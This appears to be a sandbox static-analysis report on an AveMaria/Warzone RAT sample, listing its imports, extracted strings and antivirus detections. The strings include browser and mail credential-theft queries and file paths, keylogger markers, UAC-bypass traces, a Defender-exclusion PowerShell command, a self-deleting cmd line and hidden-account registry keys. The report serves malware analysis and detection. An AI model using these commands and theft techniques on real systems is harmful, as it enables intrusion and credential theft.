Static | ZeroBOX

PE Compile Time

2022-07-21 16:34:06

PE Imphash

56fc94e02d7bc310030753938e49a91a

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x0001718e    0x00017200        6.53878836755
.rdata  0x00019000       0x00004f9a    0x00005000        5.25323655725
.data   0x0001e000       0x00135108    0x00000600        4.98101929827
.rsrc   0x00154000       0x00002c70    0x00002e00        3.95826910458
.reloc  0x00157000       0x000012c4    0x00001400        6.6007066236
.bss    0x00159000       0x00001000    0x00000200        4.25694651655

Resources

Name    Offset      Size        Language      Sub-language          File type
WM_DSP  0x00154070  0x00002c00  LANG_ENGLISH  SUBLANG_ARABIC_QATAR  PE32 executable (GUI) Intel 80386, for MS Windows

Imports

Library webservices.dll:
Library bcrypt.dll:
0x41933c BCryptSetProperty
0x419348 BCryptDecrypt
Library KERNEL32.dll:
0x41908c lstrcpyW
0x419090 GetTickCount
0x419094 HeapAlloc
0x419098 GetProcessHeap
0x41909c GetCommandLineA
0x4190a0 GetStartupInfoA
0x4190a4 HeapFree
0x4190a8 VirtualAlloc
0x4190ac HeapReAlloc
0x4190b0 VirtualQuery
0x4190b4 LocalAlloc
0x4190b8 LocalFree
0x4190c0 TerminateThread
0x4190c4 CreateThread
0x4190c8 WriteProcessMemory
0x4190cc GetCurrentProcess
0x4190d0 OpenProcess
0x4190d8 VirtualProtectEx
0x4190dc VirtualAllocEx
0x4190e0 CreateRemoteThread
0x4190e4 GetModuleHandleW
0x4190e8 IsWow64Process
0x4190ec WriteFile
0x4190f0 CreateFileW
0x4190f4 LoadLibraryW
0x4190f8 GetLocalTime
0x4190fc GetCurrentThreadId
0x419100 GetCurrentProcessId
0x419104 ReadFile
0x419108 FindFirstFileA
0x41910c GetBinaryTypeW
0x419110 FindNextFileA
0x419114 GetFullPathNameA
0x419118 CreateFileA
0x41911c GlobalAlloc
0x419124 lstrcmpA
0x419128 GetFileSize
0x41912c FreeLibrary
0x419130 SetDllDirectoryW
0x419134 GetFileSizeEx
0x419138 WaitForSingleObject
0x419140 CreatePipe
0x419144 PeekNamedPipe
0x419148 DuplicateHandle
0x41914c SetEvent
0x419150 CreateProcessW
0x419154 CreateEventA
0x419158 GetModuleFileNameW
0x41915c WideCharToMultiByte
0x419160 LoadResource
0x419164 FindResourceW
0x419168 GetComputerNameW
0x419170 LoadLibraryExW
0x419174 FindFirstFileW
0x419178 FindNextFileW
0x41917c SetFilePointer
0x419184 CopyFileW
0x419188 GetDriveTypeW
0x419194 lstrlenA
0x41919c CreateMutexA
0x4191a0 ReleaseMutex
0x4191a4 TerminateProcess
0x4191b0 Process32NextW
0x4191b4 Process32FirstW
0x4191b8 DeleteFileW
0x4191bc SizeofResource
0x4191c0 VirtualProtect
0x4191c4 GetSystemDirectoryW
0x4191c8 LockResource
0x4191d0 Process32First
0x4191d4 Process32Next
0x4191d8 GetTempPathA
0x4191e0 lstrlenW
0x4191e4 lstrcmpW
0x4191e8 CreateProcessA
0x4191ec WinExec
0x4191f0 ExitProcess
0x4191f4 GetProcAddress
0x4191f8 lstrcpyA
0x4191fc CloseHandle
0x419200 lstrcatW
0x419204 LoadLibraryA
0x419208 GetLastError
0x419210 GetModuleHandleA
0x419214 GetTempPathW
0x419218 VirtualFree
0x41921c SetLastError
0x419220 Sleep
0x419224 GetModuleFileNameA
0x419228 CreateDirectoryW
0x41922c MultiByteToWideChar
0x419230 lstrcatA
Library USER32.dll:
0x419298 GetKeyState
0x41929c GetMessageA
0x4192a0 DispatchMessageA
0x4192a4 CreateWindowExW
0x4192a8 CallNextHookEx
0x4192ac GetAsyncKeyState
0x4192b0 RegisterClassW
0x4192b4 GetRawInputData
0x4192b8 MapVirtualKeyA
0x4192bc DefWindowProcA
0x4192c4 TranslateMessage
0x4192c8 ToUnicode
0x4192cc wsprintfW
0x4192d0 PostQuitMessage
0x4192d4 GetLastInputInfo
0x4192d8 GetForegroundWindow
0x4192dc GetWindowTextW
0x4192e0 wsprintfA
0x4192e4 GetKeyNameTextW
0x4192e8 CharLowerW
Library ADVAPI32.dll:
0x419000 RegDeleteValueW
0x419010 OpenProcessToken
0x419014 FreeSid
0x419018 LookupAccountSidW
0x41901c RegCreateKeyExW
0x419020 RegDeleteKeyW
0x419028 RegDeleteKeyA
0x419030 RegQueryValueExW
0x419034 RegOpenKeyExW
0x419038 RegOpenKeyExA
0x41903c RegEnumKeyExW
0x419040 RegQueryValueExA
0x419044 RegQueryInfoKeyW
0x419048 RegCloseKey
0x41904c OpenServiceW
0x419054 QueryServiceConfigW
0x41905c StartServiceW
0x419060 RegSetValueExW
0x419064 RegCreateKeyExA
0x419068 OpenSCManagerW
0x41906c CloseServiceHandle
0x419070 GetTokenInformation
0x419074 RegSetValueExA
Library SHELL32.dll:
0x419254 SHGetFolderPathW
0x419258 ShellExecuteExA
0x41925c None
0x419264 SHFileOperationW
0x419270 ShellExecuteW
Library urlmon.dll:
0x419368 URLDownloadToFileW
Library WS2_32.dll:
0x4192f8 getaddrinfo
0x4192fc setsockopt
0x419300 freeaddrinfo
0x419304 htons
0x419308 recv
0x41930c socket
0x419310 send
0x419314 WSAConnect
0x419318 WSAStartup
0x41931c shutdown
0x419320 closesocket
0x419324 WSACleanup
0x419328 connect
0x41932c InetNtopW
0x419330 gethostbyname
0x419334 inet_addr
Library ole32.dll:
0x419350 CoCreateInstance
0x419354 CoInitialize
0x419358 CoTaskMemFree
0x41935c CoUninitialize
Library SHLWAPI.dll:
0x419278 StrStrW
0x41927c PathFindExtensionW
0x419280 PathCombineA
0x419284 PathFindFileNameW
0x419288 StrStrA
0x41928c PathRemoveFileSpecA
0x419290 PathFileExistsW
Library NETAPI32.dll:
0x419240 NetUserAdd
Library OLEAUT32.dll:
0x41924c VariantInit
Library CRYPT32.dll:
0x41907c CryptUnprotectData
Library WININET.dll:

Strings

127.0.0.2
shutdown.exe /r /t 00
shutdown.exe /r /f /t 00
RtlAdjustPrivilege
ntdll.dll
NtRaiseHardError
cmd.exe /C ping 1.2.3.4 -n 4 -w 1000 > Nul & cmd.exe /C
\cookies.sqlite
\Microsoft\Edge\User Data\Default\cookies
\Microsoft\Windows\INetCookies
\Microsoft\Windows\Cookies
abcdefghijklmnopqrstuvwxyzABCDEFGHIJK...
Ws2_32.dll
connect
nevergonnagiveyouup
USER32.DLL
MessageBoxA
Assert
An assertion condition failed
PureCall
A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application
microsoft.com
GET http://microsoft.com/ HTTP/1.1
Host: microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
XXXXXX
\System32\cmd.exe
LdrGetProcedureAddress
RtlNtStatusToDosError
RtlSetLastWin32Error
NtAllocateVirtualMemory
NtProtectVirtualMemory
NtWriteVirtualMemory
LdrLoadDll
RtlCreateUserThread
GetRawInputData
ToUnicode
MapVirtualKeyA
c:\windows\system32\user32.dll
SetWindowsHookExA
select signon_realm, origin_url, username_value, password_value from wow_logins
select signon_realm, origin_url, username_value, password_value from logins
select host_key, path, name, encrypted_value, expires_utc, is_httponly, samesite, is_secure from cookies
SELECT host, path, name, value, expiry, isHttpOnly, isSecure FROM moz_cookies
NSS_Init
PK11_GetInternalKeySlot
PK11_Authenticate
PK11SDR_Decrypt
NSSBase64_DecodeBuffer
PK11_CheckUserPassword
NSS_Shutdown
PK11_FreeSlot
PR_GetError
vaultcli.dll
VaultOpenVault
VaultCloseVault
VaultEnumerateItems
VaultGetItem
VaultFree
encryptedUsername
hostname
encryptedPassword
sqlite3_open
sqlite3_close
sqlite3_prepare_v2
sqlite3_column_text
sqlite3_column_int
sqlite3_column_int64
sqlite3_column_count
sqlite3_data_count
sqlite3_step
sqlite3_exec
sqlite3_open_v2
sqlite3_column_blob
sqlite3_column_type
sqlite3_column_bytes
sqlite3_close_v2
sqlite3_finalize
Storage
Accounts\Account.rec0
software\Aerofox\FoxmailPreview
Executable
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
127.0.0.1
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
RtlGetVersion
RtlCreateUnicodeStringFromAsciiz
RtlInitAnsiString
IsWow64Process
kernel32
VirtualQuery
cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
Software\Classes\Folder\shell\open\command
DelegateExecute
cmd.exe /C C:\Windows\System32\sdclt.exe
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
explorer.exe
powershell Add-MpPreference -ExclusionPath
find.exe
find.db
-w %ws -d C -f %s
Software\Microsoft\Windows\CurrentVersion\Internet Settings
MaxConnectionsPer1_0Server
MaxConnectionsPerServer
BQAaR$43!QAFff
?lst@@YAXHJ@Z
gqw|:1
.text$di
.text$mn
.text$yd
.idata$5
.rdata
.rdata$voltmd
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.CRT$XCA
.CRT$XCU
.CRT$XCZ
.rsrc$01
.rsrc$02
WsFileTimeToDateTime
webservices.dll
BCryptDecrypt
BCryptOpenAlgorithmProvider
BCryptSetProperty
BCryptGenerateSymmetricKey
bcrypt.dll
CreateDirectoryW
GetModuleFileNameA
SetLastError
VirtualFree
GetTempPathW
GetModuleHandleA
GetPrivateProfileStringW
GetLastError
LoadLibraryA
lstrcatW
CloseHandle
GetProcAddress
ExitProcess
WinExec
CreateProcessA
lstrcmpW
lstrlenW
ExpandEnvironmentStringsW
lstrlenA
lstrcmpA
lstrcatA
MultiByteToWideChar
lstrcpyA
WideCharToMultiByte
lstrcpyW
GetTickCount
HeapAlloc
GetProcessHeap
GetCommandLineA
GetStartupInfoA
HeapFree
VirtualAlloc
HeapReAlloc
VirtualQuery
LocalAlloc
LocalFree
SystemTimeToFileTime
TerminateThread
CreateThread
WriteProcessMemory
GetCurrentProcess
OpenProcess
GetWindowsDirectoryA
VirtualProtectEx
VirtualAllocEx
CreateRemoteThread
GetModuleHandleW
IsWow64Process
WriteFile
CreateFileW
LoadLibraryW
GetLocalTime
GetCurrentThreadId
GetCurrentProcessId
ReadFile
FindFirstFileA
GetBinaryTypeW
FindNextFileA
GetFullPathNameA
CreateFileA
GlobalAlloc
GetCurrentDirectoryW
SetCurrentDirectoryW
GetFileSize
FreeLibrary
SetDllDirectoryW
GetFileSizeEx
WaitForSingleObject
WaitForMultipleObjects
CreatePipe
PeekNamedPipe
DuplicateHandle
SetEvent
CreateProcessW
CreateEventA
GetModuleFileNameW
LoadResource
FindResourceW
GetComputerNameW
GlobalMemoryStatusEx
LoadLibraryExW
FindFirstFileW
FindNextFileW
SetFilePointer
GetLogicalDriveStringsW
CopyFileW
GetDriveTypeW
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSection
DeleteCriticalSection
CreateMutexA
ReleaseMutex
TerminateProcess
K32GetModuleFileNameExW
CreateToolhelp32Snapshot
Process32NextW
Process32FirstW
DeleteFileW
SizeofResource
VirtualProtect
GetSystemDirectoryW
LockResource
GetWindowsDirectoryW
Process32First
Process32Next
GetTempPathA
KERNEL32.dll
CharLowerW
wsprintfW
wsprintfA
GetWindowTextW
GetForegroundWindow
GetLastInputInfo
PostQuitMessage
GetKeyNameTextW
ToUnicode
TranslateMessage
RegisterRawInputDevices
DefWindowProcA
MapVirtualKeyA
GetRawInputData
RegisterClassW
GetAsyncKeyState
CallNextHookEx
CreateWindowExW
DispatchMessageA
GetMessageA
GetKeyState
USER32.dll
RegQueryValueExW
RegOpenKeyExW
RegOpenKeyExA
RegEnumKeyExW
RegQueryValueExA
RegQueryInfoKeyW
RegCloseKey
OpenServiceW
ChangeServiceConfigW
QueryServiceConfigW
EnumServicesStatusExW
StartServiceW
RegSetValueExW
RegCreateKeyExA
OpenSCManagerW
CloseServiceHandle
GetTokenInformation
LookupAccountSidW
FreeSid
OpenProcessToken
AllocateAndInitializeSid
AdjustTokenPrivileges
LookupPrivilegeValueW
RegDeleteValueW
RegSetValueExA
RegCreateKeyExW
RegDeleteKeyW
InitializeSecurityDescriptor
RegDeleteKeyA
SetSecurityDescriptorDacl
ADVAPI32.dll
ShellExecuteW
SHGetFolderPathW
SHCreateDirectoryExW
SHGetSpecialFolderPathW
SHFileOperationW
SHGetKnownFolderPath
ShellExecuteExA
SHELL32.dll
URLDownloadToFileW
urlmon.dll
getaddrinfo
freeaddrinfo
WSAConnect
InetNtopW
WS2_32.dll
CoInitialize
CoCreateInstance
CoInitializeSecurity
CoUninitialize
CoTaskMemFree
ole32.dll
PathFindExtensionW
StrStrA
PathFindFileNameW
PathCombineA
PathRemoveFileSpecA
StrStrW
PathFileExistsW
SHLWAPI.dll
NetLocalGroupAddMembers
NetUserAdd
NETAPI32.dll
OLEAUT32.dll
CryptStringToBinaryA
CryptUnprotectData
CryptStringToBinaryW
CRYPT32.dll
InternetTimeToSystemTimeA
WININET.dll
RtlGetCurrentPeb
RtlEnterCriticalSection
RtlLeaveCriticalSection
RtlInitUnicodeString
RtlFillMemory
NtAllocateVirtualMemory
LdrEnumerateLoadedModules
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
<servicing>
<package action="install">
<assemblyIdentity name="Package_1_for_KB929761" version="6.0.1.1" language="neutral" processorArchitecture="x86" publicKeyToken="31bf3856ad364e35"/>
<source location="%configsetroot%\Windows6.0-KB929761-x86.CAB" />
</package>
</servicing>
</unattend>
SizeofResource
WriteFile
GetModuleFileNameW
GetTempPathW
WaitForSingleObject
CreateFileW
GetSystemDirectoryW
lstrcatW
LockResource
CloseHandle
LoadLibraryW
LoadResource
FindResourceW
GetWindowsDirectoryW
GetProcAddress
ExitProcess
KERNEL32.dll
MessageBoxW
USER32.dll
SHCreateItemFromParsingName
ShellExecuteExW
SHELL32.dll
CoInitialize
CoUninitialize
CoCreateInstance
CoGetObject
ole32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
GetStartupInfoW
ExpandEnvironmentStringsW
TerminateProcess
OpenProcess
CreateToolhelp32Snapshot
Process32NextW
Process32FirstW
CloseHandle
ExitProcess
CreateProcessW
lstrcmpW
KERNEL32.dll
RegQueryValueExW
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
PathFindFileNameW
SHLWAPI.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
IsProcessorFeaturePresent
\Microsoft Vision\
\Documents:ApplicationData
Local\Google\Chrome\User Data\Default\Network\Cookies
\Mozilla\Firefox\
profiles.ini
Profile
ntdll.dll
User32.dll
ExplorerIdentifier
%02d-%02d-%02d_%02d.%02d.%02d
Unknow
{Unknown}
[ENTER]
[BKSP]
[CTRL]
[CAPS]
Profile %d
Default
\Google\Chrome\User Data\Local State
\Google\Chrome\User Data\Default\Network\Cookies
\Google\Chrome\User Data\Default\Login Data
\Google\Chrome Beta\User Data\Local State
\Google\Chrome Beta\User Data\Default\Login Data
\Epic Privacy Browser\User Data\Local State
\Epic Privacy Browser\User Data\Default\Login Data
\Microsoft\Edge\User Data\Local State
\Microsoft\Edge\User Data\Default\Login Data
\UCBrowser\User Data_i18n\Local State
\UCBrowser\User Data_i18n\Default\UC Login Data.17
\Tencent\QQBrowser\User Data\Local State
\Tencent\QQBrowser\User Data\Default\Login Data
\Opera Software\Opera Stable\Local State
\Opera Software\Opera Stable\Login Data
\Blisk\User Data\Local State
\Blisk\User Data\Default\Login Data
\Chromium\User Data\Local State
\Chromium\User Data\Default\Login Data
\BraveSoftware\Brave-Browser\User Data\Local State
\BraveSoftware\Brave-Browser\User Data\Default\Login Data
\Vivaldi\User Data\Local State
\Vivaldi\User Data\Default\Login Data
\Comodo\Dragon\User Data\Local State
\Comodo\Dragon\User Data\Default\Login Data
\Torch\User Data\Local State
\Torch\User Data\Default\Login Data
\Slimjet\User Data\Local State
\Slimjet\User Data\Default\Login Data
\CentBrowser\User Data\Local State
\CentBrowser\User Data\Default\Login Data
Software\Microsoft\Windows\CurrentVersion\App Paths\
softokn3.dll
msvcp140.dll
mozglue.dll
vcruntime140.dll
freebl3.dll
nss3.dll
msvcr120.dll
msvcp120.dll
Internet Explorer
firefox.exe
\firefox.exe
\logins.json
thunderbird.exe
\Thunderbird\
Could not decrypt
Account Name
POP3 Server
POP3 User
SMTP Server
POP3 Password
SMTP Password
HTTP Password
IMAP Password
Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
ChainingModeGCM
ChainingMode
"os_crypt":{"encrypted_key":"
TermService
%ProgramFiles%
%windir%\System32
%ProgramW6432%
\Microsoft DN1
\rfxvmt.dll
\rdpwrap.ini
\sqlmap.dll
SeDebugPrivilege
%SystemRoot%\System32\termsrv.dll
SYSTEM\CurrentControlSet\Services\TermService\Parameters
ServiceDll
SYSTEM\CurrentControlSet\Services\TermService
ImagePath
svchost.exe
svchost.exe -k
CertPropSvc
SessionEnv
ServicesActive
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns
SYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip Redirector
SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC
fDenyTSConnections
EnableConcurrentSessions
AllowMultipleTSSessions
RDPClip
A\cmd.exe
SOFTWARE\Microsoft\Cryptography
MachineGuid
root\CIMV2
SELECT Name FROM Win32_VideoController
Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\
InitWindows
Software\Microsoft\Windows\CurrentVersion\Run\
:Zone.Identifier
\programs.bat
for /F "usebackq tokens=*" %%A in ("
:start
") do %%A
wmic process call create '"
SOFTWARE\_rptls
Install
\System32\cmd.exe
WM_DSP
e\sdclt.exe
ADescription
FriendlyName
Source
Grabber
Asend.db
WM_DSP
ntdll.dll
Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
explorer.exe
\explorer.exe
WM_DISP
dismcore.dll
ellocnak.xml
\pkgmgr.exe
/n:%temp%\ellocnak.xml
Hey I'm Admin
WM_DISP
SOFTWARE\_rptls
Install
%systemroot%\system32\
Antivirus Signature
Bkav W32.VinaPhuonterOD.Trojan
Lionic Trojan.Win32.Agentb.ts68
Elastic Windows.Trojan.AveMaria
MicroWorld-eScan Generic.Dacic.B09FDD2A.A.4A8BB960
ClamAV Win.Malware.AveMaria-8799014-1
CMC Clean
CAT-QuickHeal Clean
ALYac Generic.Dacic.B09FDD2A.A.4A8BB960
Malwarebytes Generic.Malware.AI.DDS
VIPRE Generic.Dacic.B09FDD2A.A.4A8BB960
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 0054d10e1 )
BitDefender Generic.Dacic.B09FDD2A.A.4A8BB960
K7GW Trojan ( 0054d10e1 )
Cybereason malicious.4e8ac4
Baidu Clean
VirIT Trojan.Win32.Genus.LOX
Cyren W32/Antiav.INDT-0919
Symantec Infostealer
tehtris Generic.Malware
ESET-NOD32 Win32/Warzone.A
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky Trojan.Win32.Agentb.jiad
Alibaba Backdoor:Win32/Remcos.09dde9c2
NANO-Antivirus Trojan.Win32.AntiAV.fljpfv
ViRobot Trojan.Win.Z.Dacic.135168.BF
Rising Stealer.AveMaria!1.E64D (CLASSIC)
TACHYON Trojan-PWS/W32.WarzoneRat.135168
Sophos Mal/Behav-039
F-Secure Trojan.TR/Redcap.ghjpt
DrWeb Trojan.PWS.Maria.3
Zillya Trojan.Agent.Win32.2881435
TrendMicro TrojanSpy.Win32.MOCRT.SM
McAfee-GW-Edition BehavesLike.Win32.Downloader.ch
Trapmine malicious.high.ml.score
FireEye Generic.mg.95c3df5b6840fc84
Emsisoft Generic.Dacic.B09FDD2A.A.4A8BB960 (B)
Ikarus Trojan-Spy.Win32.AveMaria
GData Win32.Backdoor.AveMaria.A
Jiangmin Trojan.Agentb.mmn
Webroot W32.Trojan.Gen
Avira TR/Redcap.ghjpt
Antiy-AVL Trojan[Backdoor]/Win32.Remcos
Gridinsoft Trojan.Win32.WarzoneRAT.bot
Xcitium Clean
Arcabit Generic.Dacic.B09FDD2A.A.4A8BB960
SUPERAntiSpyware Trojan.Agent/Gen-Stealer
ZoneAlarm Trojan.Win32.Agentb.jiad
Microsoft Trojan:Win32/Remcos!ic
Google Detected
AhnLab-V3 Trojan/Win32.AveMaria.R263895
Acronis Clean
BitDefenderTheta Gen:NN.ZexaF.36662.iyW@aiQHI7li
MAX malware (ai score=80)
DeepInstinct MALICIOUS
VBA32 TrojanSpy.AveMaria
Cylance unsafe
Panda Trj/Genetic.gen
Zoner Trojan.Win32.153248
TrendMicro-HouseCall TrojanSpy.Win32.MOCRT.SM
Tencent Malware.Win32.Gencirc.10be43bb
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.204039776.susgen
Fortinet W32/Agent.TJS!tr
AVG Win32:Malware-gen
Avast Win32:Malware-gen
CrowdStrike win/malicious_confidence_100% (W)
No IRMA results available.